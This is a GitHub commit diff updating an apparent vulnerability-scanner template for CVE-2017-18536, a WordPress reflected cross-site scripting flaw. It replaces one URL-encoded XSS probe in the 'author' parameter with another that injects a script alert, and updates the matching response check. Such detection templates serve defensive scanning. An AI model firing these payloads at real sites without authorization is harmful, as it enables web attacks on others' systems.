Update CVE-2017-18536.yaml

patch-1
Prince Chaddha 2021-07-19 11:29:58 +05:30 committed by GitHub
parent 63765c5693
commit 70b1ba08d6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions

View File

@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
- "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=javascript:prompt(123)>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word